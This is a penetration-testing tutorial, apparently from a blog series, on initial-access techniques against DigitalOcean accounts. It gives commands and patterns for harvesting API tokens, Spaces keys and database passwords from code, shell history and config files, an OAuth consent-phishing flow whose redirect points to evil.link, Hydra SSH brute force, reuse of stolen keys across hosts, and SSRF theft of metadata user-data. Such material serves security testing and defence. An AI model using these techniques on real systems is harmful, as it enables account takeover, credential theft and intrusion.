Initial Access

We will be looking at Initial Access methods on DigitalOcean, such as Droplet access, the API, phishing, Kubernetes and Container Registry access, and more.

Introduction

Now that we have sort of a profile of our target, let's see how we can get access to their infrastructure and how Digital Ocean enables us to do it.

Some basics

To be (an Admin) or not to be.

As I explained in the previous article, DigitalOcean has no IAM (or at least not a good one).

Every account has teams, teams can be assigned to projects, and every user in a team is an admin on those projects: they can do everything except assign other users to teams.

The only one that can do that is the Owner:

So, accessing the dashboard as one of the admins (not necessarily the Owner) will give you full access to their projects. How do we do that?

  • Weak/Breached passwords

  • Phishing

  • Physical/GUI Access to their machine

The issue with logging in to the portal

With DO, even if you have not set up 2FA, the site will ask you for a 2FA code that is sent to your email address. Now, there is always the chance that the email password and the DO portal password are the same, but let's set that aside.

Now, there are some ways to look past that:

  • User session on a computer: When you log in on a device, you can ask DO to trust it, so you don't have to enter an MFA code for 60 days. So, if you have the password and GUI access to the machine, you can access the portal.

  • Federated login through other parties: DigitalOcean allows you to authenticate through Google and GitHub, so you don't have to have a password for the portal. This, while being OK, has the issue of breached accounts and access through them. So, if an attacker gets access to the Gmail or GitHub account that the admin logs in with, they can access the portal. Also, some companies create dedicated Gmail or GitHub accounts just to manage their projects, and those accounts usually don't have 2FA.

  • No password expiry on DigitalOcean: There is no password expiry on DigitalOcean, so you might find the same password still working even after breaches. This might help you access other parties such as email, GitHub, or even the dashboard.

API Overview in Digital Ocean

The DigitalOcean API surface includes the main DigitalOcean API, the Droplet Metadata API, the OAuth API, and the Spaces API.

  • The Spaces API is basically the AWS S3 bucket API with fewer features

  • OAuth API authentication is done through a Client ID and a Client Secret, which results in a DigitalOcean API token

  • The Droplet Metadata API is the same as the one we find on other cloud providers' VMs, on host 169.254.169.254

  • The DigitalOcean API is a REST-based API, where you authenticate with a token you create on the dashboard. The tokens can be Read or Read/Write.

DigitalOcean API

DigitalOcean's API can be used to manage:

  • Droplets

  • Functions

  • One-Click Apps

  • Kubernetes

  • Container Registry

  • Databases

  • Snapshots

  • Images

  • Domains

  • Firewalls

  • etc

So, basically anything that is not a Space or Meta-Data.

Its tokens can be Read or Read/Write for everything, so no granular privileges are given. Also, the token has a specific format:

dop_v1_<64 hex characters (0-9 and a-f)>

For example:

dop_v1_0d858f990cf1cf84291d346538e2ad53532be2569fbeb8f3b7ba6b190d6aa0ad

Those tokens can be used to access the HTTP-based API using curl (or any programmatic equivalent of it), or doctl (the DigitalOcean CLI):
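For example, a minimal sketch (the token is a placeholder, and the endpoints are the standard v2 API ones):

export DO_TOKEN="dop_v1_<your token>"

# Query the account endpoint with curl
curl -s -H "Authorization: Bearer $DO_TOKEN" "https://api.digitalocean.com/v2/account"

# Or authenticate doctl with the same token and enumerate
doctl auth init --access-token "$DO_TOKEN"
doctl account get
doctl compute droplet list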

As we saw, in both cases the token needs to be present somewhere (an environment variable, a command-line argument, a script file, etc.).

We will now look at the DigitalOcean API and see how to get initial access with it.

Where to look

You can look for DO's token in one of the following places (a quick search sketch follows the list):

  • DO Portal

  • Source Code

  • Config Files

    • Kubernetes

    • Container Registry

  • Console History (bash, sh, zsh, ksh, powershell)

  • Droplets

  • Functions
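As a rough sketch of the kind of search you can run on a breached machine or a cloned repository (the paths are just examples), based on the token format above:

# Look for hardcoded tokens in code and config files
grep -rEo 'dop_v1_[a-f0-9]{64}' /path/to/repo /home /etc 2>/dev/null

# Shell history often contains tokens passed on the command line
grep -E 'dop_v1_|doctl' ~/.bash_history ~/.zsh_history 2>/dev/null

# doctl usually caches the token in its config file (Linux path shown)
cat ~/.config/doctl/config.yaml 2>/dev/null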

DO Portal

If you get access as a user on the portal, you can access the API section or generate a new token. The tokens show whether they are Read or Read/Write tokens, or Spaces (S3) API keys.

This can also be used for persistence, but we'll see that later.

Config Files

Container Registry Config File

When the Container Registry is configured, you get a JSON file (named docker-config.json) with a Base64-encoded credential.

This credential is basically a DigitalOcean Read or Read/Write token:
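A quick way to check, assuming the usual Docker config layout (the registry key name may differ per setup):

# Pull the Base64 credential out of docker-config.json and decode it
jq -r '.auths["registry.digitalocean.com"].auth' docker-config.json | base64 -d
# Typically decodes to <dop_v1_token>:<dop_v1_token>, i.e. the API token used as both username and password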

Even though this only says the token can push, pull, or delete images, you get a token with full Read/Write privileges, which can be used for anything except Spaces. In the example below, we create a Droplet using this token:
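Roughly, that request looks like this with curl (the name, region, size, and image slugs are just placeholders):

curl -s -X POST "https://api.digitalocean.com/v2/droplets" \
  -H "Authorization: Bearer $DO_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name":"innocent-droplet","region":"fra1","size":"s-1vcpu-1gb","image":"ubuntu-22-04-x64"}'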

So, if you find a Container Registry Config File, check for its privileges.

Kubernetes Config File

When a Kubernetes cluster is created, a YAML config file is created too, in which you will find:

  • Cluster ID

  • Cluster Endpoint

  • Cluster Certificate

  • Cluster Admin

  • DO Token

The token is a read-only token, but it can still be used for enumeration, since it has global Reader rights.
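A small sketch, assuming the token sits in the users section of the downloaded kubeconfig:

# Pull the token out of the kubeconfig
grep 'token:' kubeconfig.yaml

# Reuse it against the main API for enumeration, e.g. listing Droplets
curl -s -H "Authorization: Bearer <token from kubeconfig>" "https://api.digitalocean.com/v2/droplets"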

Space

Space API

Spaces are built on AWS S3 bucket technology, so their API is essentially the AWS S3 API. The only differences are that the endpoint is different (https://<region>.digitaloceanspaces.com), the access key does not follow the AWS format (ASIA, AKIA, etc.), and there are far fewer features.

As for privileges, fuck you: a set of credentials can do everything. No boundaries; a set of creds effectively has S3FullAccess rights, and no granular permissions can be set.

Below is a matrix of what is and is not allowed through the API (this was taken in 2022; depending on when you read this, it might have changed. Check the link for more: https://docs.digitalocean.com/reference/api/spaces-api/)

If you get access to a set of credentials, then depending on how they are used, you can (see the sketch after this list):

  • List and Get sensitive files

    • Code, SSH Keys, Documents

  • Modify files resulting in RCE

  • Access function code stored on spaces
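Since Spaces are S3-compatible, the plain AWS CLI works against them. A minimal sketch (the region and Space name are placeholders):

export AWS_ACCESS_KEY_ID="<spaces key>"
export AWS_SECRET_ACCESS_KEY="<spaces secret>"

# List what the credentials can see
aws s3 ls --endpoint-url https://fra1.digitaloceanspaces.com

# Download an interesting file from a Space
aws s3 cp s3://<space-name>/<file> . --endpoint-url https://fra1.digitaloceanspaces.com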

Check for credentials on:

  • Code Repositories

  • awscli or s3api config directories (e.g. ~/.aws) on breached machines

  • Other insecure Spaces

  • Different breaches

Phishing Using OAuth API

DigitalOcean's OAuth API allows an application to access your infrastructure with your consent. It's a good way to grant temporary access to the infrastructure.

It's also a great phishing method.

OAuth API in Digital Ocean works kind of the same as a combination of Service Principals and Application Consent from Azure. Sort of...

The idea is that we have a Client ID and a Client Secret, and we send the target a consent link whose redirect points to an address we control. If they agree to give permission to a project, you get access to that project using a token.

When the request is made, i.e. when the target clicks the link and consents, you get an authorization code. The code is sent as a parameter to the phishing (redirect) link, like:

http://evil.link/?code=<code>

You take that code, the Client ID, and the Client Secret, and send a curl request to exchange them for an API token.
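A hedged sketch of that exchange, using DigitalOcean's OAuth token endpoint (all values are placeholders):

curl -s -X POST "https://cloud.digitalocean.com/v1/oauth/token" \
  -d "grant_type=authorization_code" \
  -d "code=<code from the phishing link>" \
  -d "client_id=<client id>" \
  -d "client_secret=<client secret>" \
  -d "redirect_uri=http://evil.link/"
# The JSON response contains an access_token that works like a regular API token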

That way you have access to the infrastructure:

Token Scope

Another thing you should be careful about is the scope of the token, i.e. its access rights. By default, when a link is generated (the phishing link), you get a Read token:

Whereas, if you add the scope as a parameter to the link (&scope=read write, with a space between read and write), it becomes a Read/Write token:
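Roughly, the generated link then looks like this (placeholders, with the space in the scope URL-encoded):

https://cloud.digitalocean.com/v1/oauth/authorize?client_id=<client id>&redirect_uri=http%3A%2F%2Fevil.link%2F&response_type=code&scope=read%20write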

The rest is the same.

Database

Digital Ocean allows you to create managed databases on:

  • MongoDB

  • MySQL

  • PostgreSQL

  • Redis

The host has a specific format:

db-<DB type>-<region>-<some ID>-do-user-<another ID>-0.b.db.ondigitalocean.com

So, you can look for that format in source code, locally or in a repository.

Another thing you should check is the user, password, and port. Usually, the user is doadmin, the port is 25060, and the password has a format of:

AVNS_<19 alphanumeric characters>

Also, the first DB you get is defaultdb.

So, look for that too.
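A rough search sketch based on those formats (the paths are placeholders):

# Managed database hostnames in source code or config
grep -rE 'do-user-[0-9]+-0\..*\.db\.ondigitalocean\.com' /path/to/code 2>/dev/null

# Passwords following the AVNS_ format
grep -rE 'AVNS_[A-Za-z0-9]{19}' /path/to/code 2>/dev/null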

Access for all

When a database is set up, it allows access from 0.0.0.0 (i.e. everywhere) by default. So, if you find a CNAME that points to a host with port 25060 open and you can connect using a DB client, you've got a database server.
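A quick check sketch, using a placeholder hostname that follows the format above:

# Is the managed-database port open?
nmap -Pn -p 25060 db-postgresql-fra1-12345-do-user-1234567-0.b.db.ondigitalocean.com

# Try connecting (PostgreSQL example; managed DBs require SSL)
psql "host=db-postgresql-fra1-12345-do-user-1234567-0.b.db.ondigitalocean.com port=25060 user=doadmin password=AVNS_... dbname=defaultdb sslmode=require"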

Another free shell

The user that is logged in to the database has admin rights, so we can use the system command to run a shell on it:

Also, the DB server runs in a Docker container, and I did not find any container breakouts. But I might not have checked enough:

The container has access to the internet, but no access to the machines inside the VPC. So, we cannot use it as a pivot.

Functions

As I said in the last article, Functions have a specific URL:

https://faas-region-random_chars.doserverless.co/api/v1/web/namespace_ID/package_name/function_file_name?parameter=value

The fields are the namespace, the package, and the function name.

  • The package is usually named default.

  • The namespace is tricky, as it has the format fn-cc180aae-dadc-4a12-a64a-547e02ec17a7. It's best to get it through Google dorking; fuzzing it will not help much.

As you can see, the output is different for each case:

  • Missing parameter

  • Good request

  • Nonexistent function

So you can use that to tell them apart. Also, on production-level functions, empty parameters will output something, so you might use the output for info.
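A simple probing sketch (the subdomain and function name are placeholders; the namespace reuses the example format above):

curl -s "https://faas-fra1-abcd1234.doserverless.co/api/v1/web/fn-cc180aae-dadc-4a12-a64a-547e02ec17a7/default/hello?name=test"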

Function's API

Functions can allow raw, unauthenticated requests if Web Functions are enabled.

If not, Functions can be accessed through the Functions API. In this case, the request is a POST, and the URL format is:

https://faas-fra1-afec6ce7.doserverless.co/api/v1/namespaces/<namespace_id>/actions/<function name>?blocking=true&result=true&otherparameters=otherinputs

Your best bet to get Initial Access using them is through:

  • Finding the link in Source Code

  • Console history file

  • Google dorking, a lot of luck, and a fuzzer

DO Token

Sometimes, it is necessary to add a token to the function. Functions do not have any sort of key vault, but you can configure environment variables.

So, if you get access to a function, try to look for:

  • RCE

  • LFI or Directory Traversal

One-Click Apps

To be honest, kind of the same as Functions. Just no REST API, and more output:

The package can be default and the link is:

https://<app name>-<some chars>.ondigitalocean.app/<namespace>/<package>/<action>?<parameters>=<output>

Environment variables can still be configured, but they only exist during building and running. If a token is needed, you will probably find one in:

  • Source Code

  • HTTP Request Parameters

So, pretty much this.

Droplets

SSH Bruteforce

This might seem a bit dumb, but stay with me for a bit.

When you create a Droplet, it asks you for an SSH key or a password for root, so this is what you can look for.

Also, the password needs to be at least 8 characters and cannot end in a special character, which is OK: it stops you from saving something like P4ssw0rd... but does not stop you from using P4ssw0rd as a password.

To check if password authentication is allowed for root (or any user), you can use Hydra.

Also, there are no checks on the number of password attempts over SSH, so no user lockout, meaning you don't need to care about how many attempts you make. Lastly, there is no system that monitors the logins (except for the SSH logs of course, but who checks them anyway), so have fun:
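A minimal Hydra sketch (the wordlist and target are placeholders):

hydra -l root -P passwords.txt -t 4 ssh://<droplet-ip>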

SSH Keys

As I said, when you create a new Droplet, you need to configure an SSH key to log in. The key pair is generated on your machine and then the public key is added to the Droplet.

Now, as we can see, this causes a bit of a problem when you need different keys for different Droplets on different (or the same) projects. You're either going to store the keys somewhere "securely" (like a Space), or use the same key for everything.

So, some Initial Access Vectors we can use are:

  • Access to an admin's machine and getting Private SSH Key

  • Spaces with weak permissions

Once we get access with one key, we can check for other hosts with the same key too.
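A small loop sketch for that (the key and IP list file names are hypothetical):

while read -r ip; do
  # BatchMode avoids password prompts, so only key auth is tried
  ssh -i stolen_id_rsa -o BatchMode=yes -o ConnectTimeout=5 root@"$ip" hostname && echo "[+] key works on $ip"
done < droplet_ips.txt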

SSRF

Each Droplet has a metadata API, which can be accessed at 169.254.169.254. There are no IMDSv2-like checks, so we can leverage SSRF to get access to the metadata:

Now, there are no roles that can be assigned to machines, so no session tokens (or any sort of credentials) are present on Droplets by default. So, if somebody needs to use them, they have to add them through User-Data, for example by having the API token stored in environment variables. Meaning, the route will be:

SSRF -> Meta-Data -> Access User-Data -> Access Token -> Infrastructure Access
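A sketch of the first hop, assuming a vulnerable ?url= parameter on a web app running on the Droplet (the app URL and parameter are hypothetical):

# User-Data only, via the SSRF
curl "https://victim-app.example/fetch?url=http://169.254.169.254/metadata/v1/user-data"

# Or the whole metadata document in one shot
curl "https://victim-app.example/fetch?url=http://169.254.169.254/metadata/v1.json"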

Now, use the same techniques we discussed in the API section to check whether the token has Read or Read/Write access.

Conclusion

There are a lot of ways to get access to DigitalOcean-based infrastructure, and I might have missed some. Next up is Enumeration, where we'll look at how to use those privileges to get info that might lead us to PrivEsc or Lateral Movement.
